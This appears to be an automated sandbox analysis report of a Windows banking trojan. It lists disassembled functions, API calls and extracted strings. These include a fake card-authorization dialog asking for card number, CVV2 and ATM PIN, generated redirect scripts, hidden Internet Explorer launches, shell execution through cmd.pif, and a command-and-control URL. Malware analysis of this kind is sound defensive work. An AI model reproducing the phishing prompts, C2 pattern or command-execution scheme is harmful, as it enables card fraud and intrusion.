                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
